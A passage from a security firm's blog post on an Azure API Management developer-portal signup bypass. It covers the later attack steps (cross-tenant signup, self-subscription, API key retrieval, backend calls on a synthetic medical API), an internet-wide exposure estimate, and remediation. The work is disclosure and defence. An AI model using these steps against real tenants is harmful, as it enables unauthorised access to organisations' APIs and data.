CAPTCHA challenge data and user registration details" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/http-post-request-to-signup-endpoint-with-json-payload-conta-1.webp 500w, https://www.praetorian.com/wp-content/uploads/2026/03/http-post-request-to-signup-endpoint-with-json-payload-conta-1-300x262.webp 300w" sizes="auto, (max-width: 500px) 100vw, 500px"><figcaption class="widget-image-caption wp-caption-text">Cross-tenant signup POST request with attacker credentials and replayed CAPTCHA</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-b54db11 e-con-full e-flex e-con e-parent" data-id="b54db11" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-ae3b262 elementor-widget elementor-widget-image" data-id="ae3b262" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="420" height="176" src="https://www.praetorian.com/wp-content/uploads/2026/03/http-response-showing-status-200-ok-content-type-application-1.webp" class="attachment-full size-full wp-image-10954" alt="HTTP response showing status 200 OK, Content-Type application/json header, and response body containing the string OK" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/http-response-showing-status-200-ok-content-type-application-1.webp 420w, https://www.praetorian.com/wp-content/uploads/2026/03/http-response-showing-status-200-ok-content-type-application-1-300x126.webp 300w" sizes="auto, (max-width: 420px) 100vw, 420px"><figcaption class="widget-image-caption wp-caption-text">HTTP 200 OK response confirming account creation</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-9184338 e-con-full e-flex e-con e-parent" data-id="9184338" 
data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-c079ed7 elementor-widget elementor-widget-image" data-id="c079ed7" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="1316" height="488" src="https://www.praetorian.com/wp-content/uploads/2026/03/email-from-researchpraetoriancom-asking-user-to-confirm-new-1-1.webp" class="attachment-full size-full wp-image-10955" alt="Email from research@praetorian.com asking user to confirm new API account by clicking a suspicious link with long parameters" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/email-from-researchpraetoriancom-asking-user-to-confirm-new-1-1.webp 1316w, https://www.praetorian.com/wp-content/uploads/2026/03/email-from-researchpraetoriancom-asking-user-to-confirm-new-1-1-300x111.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/email-from-researchpraetoriancom-asking-user-to-confirm-new-1-1-1024x380.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/email-from-researchpraetoriancom-asking-user-to-confirm-new-1-1-768x285.webp 768w" sizes="auto, (max-width: 1316px) 100vw, 1316px"><figcaption class="widget-image-caption wp-caption-text">Email invitation after successful self-sign-up</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-0b8f379 e-con-full e-flex e-con e-parent" data-id="0b8f379" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-49ca69a elementor-widget elementor-widget-text-editor" data-id="49ca69a" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> 
<p>The backend processes the request without validating the tenant of origin. The account is created in the target’s APIM instance. The attacker receives a confirmation email and can now log in.</p> <p><a id="Xadf1d2eff9fa4ebf9c1108a4310cd6aad77b8f3"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-189e3a5 e-con-full e-flex e-con e-parent" data-id="189e3a5" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-2da9547 elementor-widget elementor-widget-heading" data-id="2da9547" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h4 class="elementor-heading-title elementor-size-default">Step 4: Authenticate, subscribe to a product, and obtain an API key.</h4> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-5cdc911 e-con-full e-flex e-con e-parent" data-id="5cdc911" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-8c6fd2b elementor-widget elementor-widget-text-editor" data-id="8c6fd2b" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The default Starter product ships with approvalRequired: false. The attacker self-subscribes using a PUT request to the management API. 
No administrator approval is needed:</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-a3ba61d e-con-full e-flex e-con e-parent" data-id="a3ba61d" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-001045d elementor-widget elementor-widget-image" data-id="001045d" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="960" height="304" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-curl-command-making-api-call-to-azure-manag-1.webp" class="attachment-full size-full wp-image-10956" alt="Terminal showing curl command making API call to Azure Management API with Basic authentication, returning HTTP 200 response with JSON ID" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-curl-command-making-api-call-to-azure-manag-1.webp 960w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-curl-command-making-api-call-to-azure-manag-1-300x95.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-curl-command-making-api-call-to-azure-manag-1-768x243.webp 768w" sizes="auto, (max-width: 960px) 100vw, 960px"><figcaption class="widget-image-caption wp-caption-text">Attacker can authenticate as a Developer to the APIM developer portal</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-c7ad55d e-con-full e-flex e-con e-parent" data-id="c7ad55d" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-fdd9af9 elementor-widget elementor-widget-image" data-id="fdd9af9" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" 
decoding="async" width="960" height="324" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-creating-azure-subscrip-1.webp" class="attachment-full size-full wp-image-10957" alt="Terminal window showing curl command creating Azure subscription with PUT request, displaying HTTP 201 response with JSON data" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-creating-azure-subscrip-1.webp 960w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-creating-azure-subscrip-1-300x101.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-creating-azure-subscrip-1-768x259.webp 768w" sizes="auto, (max-width: 960px) 100vw, 960px"><figcaption class="widget-image-caption wp-caption-text">Self-subscribe PUT request to Starter product returns 201 Created</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-e719eab e-con-full e-flex e-con e-parent" data-id="e719eab" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-37ec580 elementor-widget elementor-widget-image" data-id="37ec580" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="960" height="344" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-to-azure-api-with-http-1-1.webp" class="attachment-full size-full wp-image-10958" alt="Terminal window showing curl command to Azure API with HTTP 200 response containing primaryKey and secondaryKey JSON values" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-to-azure-api-with-http-1-1.webp 960w, 
https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-to-azure-api-with-http-1-1-300x108.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-to-azure-api-with-http-1-1-768x275.webp 768w" sizes="auto, (max-width: 960px) 100vw, 960px"><figcaption class="widget-image-caption wp-caption-text">listSecrets response containing primary and secondary API keys</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-9f9154a e-con-full e-flex e-con e-parent" data-id="9f9154a" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-7e3c937 elementor-widget elementor-widget-image" data-id="7e3c937" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="1332" height="621" src="https://www.praetorian.com/wp-content/uploads/2026/03/email-from-praetorian-research-welcoming-elgin-lee-to-starte-1.webp" class="attachment-full size-full wp-image-10959" alt="Email from Praetorian Research welcoming Elgin Lee to Starter subscription, showing start date 3/13/2026 and API usage details" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/email-from-praetorian-research-welcoming-elgin-lee-to-starte-1.webp 1332w, https://www.praetorian.com/wp-content/uploads/2026/03/email-from-praetorian-research-welcoming-elgin-lee-to-starte-1-300x140.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/email-from-praetorian-research-welcoming-elgin-lee-to-starte-1-1024x477.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/email-from-praetorian-research-welcoming-elgin-lee-to-starte-1-768x358.webp 768w" sizes="auto, (max-width: 1332px) 100vw, 1332px"><figcaption class="widget-image-caption wp-caption-text">Confirmation email of a successful 
subscription to Starter</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-158a6cb e-con-full e-flex e-con e-parent" data-id="158a6cb" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-4a1c780 elementor-widget elementor-widget-heading" data-id="4a1c780" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h4 class="elementor-heading-title elementor-size-default">Step 5: Call backend APIs.</h4> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-0df09b6 e-con-full e-flex e-con e-parent" data-id="0df09b6" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-0186939 elementor-widget elementor-widget-text-editor" data-id="0186939" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>With a valid subscription key, the attacker makes authenticated API calls through the APIM gateway:</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-eb3b039 e-con-full e-flex e-con e-parent" data-id="eb3b039" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-ae5d147 elementor-widget elementor-widget-image" data-id="ae5d147" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="960" height="304" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-to-medical-device-api-r-1.webp" class="attachment-full size-full wp-image-10960" alt="Terminal window showing curl command to medical device API returning HTTP 200 response with JSON data showing total patient count of 12847" 
srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-to-medical-device-api-r-1.webp 960w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-to-medical-device-api-r-1-300x95.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-to-medical-device-api-r-1-768x243.webp 768w" sizes="auto, (max-width: 960px) 100vw, 960px"><figcaption class="widget-image-caption wp-caption-text">Patient count API returns 12,847 records accessible</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-5b0bd8c e-con-full e-flex e-con e-parent" data-id="5b0bd8c" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-efe2d1c elementor-widget elementor-widget-image" data-id="efe2d1c" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="960" height="1224" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-json-response-from-medical-api-with-1-1.webp" class="attachment-full size-full wp-image-10961" alt="Terminal window showing JSON response from medical API with patient records including names, diagnoses, and physician details" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-json-response-from-medical-api-with-1-1.webp 960w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-json-response-from-medical-api-with-1-1-235x300.webp 235w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-json-response-from-medical-api-with-1-1-803x1024.webp 803w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-json-response-from-medical-api-with-1-1-768x979.webp 768w" sizes="auto, (max-width: 
960px) 100vw, 960px"><figcaption class="widget-image-caption wp-caption-text">Patient search returns full records with MRNs, names, DOBs, diagnoses, and insurance IDs. All data shown above is entirely synthetic, generated by a mock API we built for research.</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-0881ea2 e-con-full e-flex e-con e-parent" data-id="0881ea2" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-52e168d elementor-widget elementor-widget-text-editor" data-id="52e168d" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>From anonymous internet access to patient health records and IoT device authentication tokens. 
Five steps, no credentials, no prior access to the target organization.</p> <p><a id="X3b0c89f01e5f0b95d7d85b6baf4140534fa4076"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-196f374 e-con-full e-flex e-con e-parent" data-id="196f374" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-28773d4 elementor-widget elementor-widget-heading" data-id="28773d4" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h2 class="elementor-heading-title elementor-size-default">Impact Spectrum: From Noise to Critical Data Exposure</h2> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-a0ecf3b e-con-full e-flex e-con e-parent" data-id="a0ecf3b" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-bd4c3aa elementor-widget elementor-widget-text-editor" data-id="bd4c3aa" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>Not every exploitable instance carries the same risk. The Azure APIM signup bypass is the common entry point, but the severity depends on what the organization has placed behind its Developer Portal. 
We configured three tiers of APIM instances to illustrate the range.</p> <p><a id="the-exploitability-matrix"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-4e77759 e-con-full e-flex e-con e-parent" data-id="4e77759" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-5ec516e elementor-widget elementor-widget-heading" data-id="5ec516e" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">The Exploitability Matrix</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-0880218 e-con-full e-flex e-con e-parent" data-id="0880218" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-a550547 elementor-widget elementor-widget-text-editor" data-id="a550547" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-4c7cf49 e-con-full e-flex e-con e-parent" data-id="4c7cf49" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-8cdd448 elementor-widget elementor-widget-image" data-id="8cdd448" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="1768" height="1254" src="https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-security-risk-paths-from-cross-tenant-sign-1.webp" class="attachment-full size-full wp-image-10962" alt="Flowchart showing security risk paths from cross-tenant signup through subscription decisions to final risk outcomes" 
srcset="https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-security-risk-paths-from-cross-tenant-sign-1.webp 1768w, https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-security-risk-paths-from-cross-tenant-sign-1-300x213.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-security-risk-paths-from-cross-tenant-sign-1-1024x726.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-security-risk-paths-from-cross-tenant-sign-1-768x545.webp 768w, https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-security-risk-paths-from-cross-tenant-sign-1-1536x1089.webp 1536w" sizes="auto, (max-width: 1768px) 100vw, 1768px"><figcaption class="widget-image-caption wp-caption-text">Exploitability decision tree showing impact tiers based on product configuration</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-b7518ed e-con-full e-flex e-con e-parent" data-id="b7518ed" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-271b93e elementor-widget elementor-widget-heading" data-id="271b93e" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h2 class="elementor-heading-title elementor-size-default">At Scale: 25,000+ Developer Portals Exposed</h2> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-aadbc6f e-con-full e-flex e-con e-parent" data-id="aadbc6f" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-b31aeb1 elementor-widget elementor-widget-text-editor" data-id="b31aeb1" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The original advisory demonstrated the vulnerability against individual instances. 
We assessed the scope: how many Azure APIM Developer Portals are internet-facing, and how many are likely vulnerable?</p> <p><a id="methodology"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-cee4eb4 e-con-full e-flex e-con e-parent" data-id="cee4eb4" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-5185086 elementor-widget elementor-widget-heading" data-id="5185086" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">Methodology</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-30f55b3 e-con-full e-flex e-con e-parent" data-id="30f55b3" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-9575057 elementor-widget elementor-widget-text-editor" data-id="9575057" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>We queried Shodan for all hosts matching hostname:developer.azure-api.net, which returned <strong>69,248 matching banners</strong> for individual port/service observations across internet-facing APIM infrastructure. After deduplication, we identified <strong>25,379 unique APIM Developer Portal instances</strong>. We used this as our sample set for heuristic analysis.</p> <p><strong>Limitation:</strong> This search only identifies portals using the default *.developer.azure-api.net hostname. Organizations that configure custom domains (e.g., developers.contoso.com with a CNAME to Azure APIM) are not captured. 
Azure uses a single wildcard TLS certificate for all APIM portals, so Certificate Transparency logs do not reveal individual instance names.</p> <p><a id="X41aea7440729aec4e61385a47baf1e16fde56eb"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-9ac8b5e e-con-full e-flex e-con e-parent" data-id="9ac8b5e" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-4a7698e elementor-widget elementor-widget-heading" data-id="4a7698e" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">Heuristic Analysis: Estimating Vulnerability at Scale</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-f694220 e-con-full e-flex e-con e-parent" data-id="f694220" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-4ecae6c elementor-widget elementor-widget-text-editor" data-id="4ecae6c" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>We designed a non-invasive heuristic probe to classify instances without triggering any signup flow or creating any accounts on third-party infrastructure.</p> <p>Our approach: send a POST /signup request with an empty JSON body ({}), no email, password, CAPTCHA, or PII, to every instance. This request cannot create an account and does not complete any step of the signup flow. The probe classifies responses based on error message content: an HTTP 400 containing “ValidationError,” “captcha,” or “challenge” indicates the signup endpoint is active and consistent with an enabled Basic Auth provider; an HTTP 404 indicates the signup endpoint does not exist. 
These are heuristic-based estimates, not confirmed exploits.</p> <p>Even accounting for the margin of error, <strong>the vast majority of internet-facing APIM Developer Portals, on the order of 23,000 to 25,000 instances, show responses consistent with an active Basic Auth signup endpoint.</strong> Only 51 instances returned HTTP 404 on /signup, indicating the Basic Auth provider has been explicitly removed.</p> <p><a id="what-this-means"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-234047d e-con-full e-flex e-con e-parent" data-id="234047d" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-87f8e55 elementor-widget elementor-widget-heading" data-id="87f8e55" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">What This Means</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-6ba5a4e e-con-full e-flex e-con e-parent" data-id="6ba5a4e" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-1e94cea elementor-widget elementor-widget-text-editor" data-id="1e94cea" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>Four months after Haatainen’s public disclosure, the data suggests that very few organizations have taken the remediation step of removing the Basic Auth provider. Because MSRC classified this as “by design,” there was no security advisory or automated patch to drive remediation. 
Organizations that use the “disable signup” toggle as their primary control may not realize that the Azure APIM signup bypass remains exploitable and that additional action is required.</p> <p><a id="remediation-closing-the-gap"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-52536c2 e-con-full e-flex e-con e-parent" data-id="52536c2" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-e870a2a elementor-widget elementor-widget-heading" data-id="e870a2a" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h2 class="elementor-heading-title elementor-size-default">Remediation: Closing the Gap</h2> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-64645fb e-con-full e-flex e-con e-parent" data-id="64645fb" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-fd6ecc4 elementor-widget elementor-widget-text-editor" data-id="fd6ecc4" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>Because MSRC has classified this behavior as “by design,” no patch or automated fix is forthcoming. Organizations running APIM need to take explicit action to close the signup endpoint. 
The fix is straightforward, but the Azure Portal’s “disable signup” toggle alone is not sufficient.</p> <p><a id="X56a8c51815d2afc6c4c811ac051689e6daa59df"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-b00aaf8 e-con-full e-flex e-con e-parent" data-id="b00aaf8" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-737a970 elementor-widget elementor-widget-heading" data-id="737a970" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">1. Delete the Basic Authentication identity provider entirely.</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-073b3c5 e-con-full e-flex e-con e-parent" data-id="073b3c5" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-638726d elementor-widget elementor-widget-text-editor" data-id="638726d" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>This is the only remediation that fully eliminates the attack surface. 
Removing the Basic Auth provider deactivates the /signup endpoint; there is no registration mechanism left for the attacker to target.</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-d8ef701 e-con-full e-flex e-con e-parent" data-id="d8ef701" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-3be925b elementor-widget elementor-widget-image" data-id="3be925b" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <img loading="lazy" decoding="async" width="960" height="164" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-delete-basic-au-1.webp" class="attachment-full size-full wp-image-10963" alt="Terminal window showing Azure CLI command to delete Basic Auth Provider from API Management service with subscription and resource group parameters" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-delete-basic-au-1.webp 960w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-delete-basic-au-1-300x51.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-delete-basic-au-1-768x131.webp 768w" sizes="auto, (max-width: 960px) 100vw, 960px"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-79a7fbe e-con-full e-flex e-con e-parent" data-id="79a7fbe" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-2e121e6 elementor-widget elementor-widget-heading" data-id="2e121e6" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">2. 
Switch to Azure AD (Entra ID) as the sole identity provider.</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-d41523e e-con-full e-flex e-con e-parent" data-id="d41523e" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-1a389e9 elementor-widget elementor-widget-text-editor" data-id="1a389e9" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>Azure AD authentication ties account creation to your organization’s directory. Cross-tenant signups are not possible because users must authenticate through your tenant’s identity system. This is the long-term architectural fix. Learn more about <a href="https://learn.microsoft.com/en-us/azure/api-management/api-management-howto-aad">configuring Azure AD as an identity provider for APIM</a>.</p> <p> </p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-0e1caac e-con-full e-flex e-con e-parent" data-id="0e1caac" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-1537899 elementor-widget elementor-widget-heading" data-id="1537899" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">3. 
Require admin approval for all product subscriptions.</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-dca0e3a e-con-full e-flex e-con e-parent" data-id="dca0e3a" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-f497d51 elementor-widget elementor-widget-text-editor" data-id="f497d51" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>Even if you cannot immediately remove Basic Auth, setting approvalRequired: true on every product prevents attackers from self-subscribing and obtaining API keys. The attacker can create an account, but cannot obtain API keys without administrator approval.</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-f100636 e-con-full e-flex e-con e-parent" data-id="f100636" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-b272011 elementor-widget elementor-widget-image" data-id="b272011" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <img loading="lazy" decoding="async" width="960" height="204" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-set-approval-re-1.webp" class="attachment-full size-full wp-image-10964" alt="Terminal window showing Azure CLI command to set approval required on Starter product using PATCH method with JSON body" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-set-approval-re-1.webp 960w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-set-approval-re-1-300x64.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-set-approval-re-1-768x163.webp 768w" 
sizes="auto, (max-width: 960px) 100vw, 960px"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-150642a e-con-full e-flex e-con e-parent" data-id="150642a" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-0342996 elementor-widget elementor-widget-heading" data-id="0342996" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">4. Audit existing developer portal accounts.</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-bfec1db e-con-full e-flex e-con e-parent" data-id="bfec1db" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-ba1b348 elementor-widget elementor-widget-text-editor" data-id="ba1b348" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>Look for accounts that were created after you “disabled” signup. Check for accounts using external email domains or accounts created via the Basic identity provider. 
Remove any unauthorized accounts and revoke their subscription keys.</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-8513f4e e-con-full e-flex e-con e-parent" data-id="8513f4e" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-7a90143 elementor-widget elementor-widget-image" data-id="7a90143" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <img loading="lazy" decoding="async" width="960" height="244" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-list-developer-1-1.webp" class="attachment-full size-full wp-image-10965" alt="Terminal window showing Azure CLI command to list developer portal users with Basic authentication, displaying API endpoint URL" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-list-developer-1-1.webp 960w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-list-developer-1-1-300x76.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-list-developer-1-1-768x195.webp 768w" sizes="auto, (max-width: 960px) 100vw, 960px"> </div> </div> </div><p>The post <a href="https://www.praetorian.com/blog/azure-apim-signup-bypass/">Azure APIM Signup Bypass: 97.9% of Developer Portals Still Exploitable Anonymously and from the Internet</a> appeared first on <a href="https://www.praetorian.com/">Praetorian</a>.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.praetorian.com/blog/">Offensive Security Blog: Latest Trends in Hacking | Praetorian</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by n8n-publisher">n8n-publisher</a>. Read the original 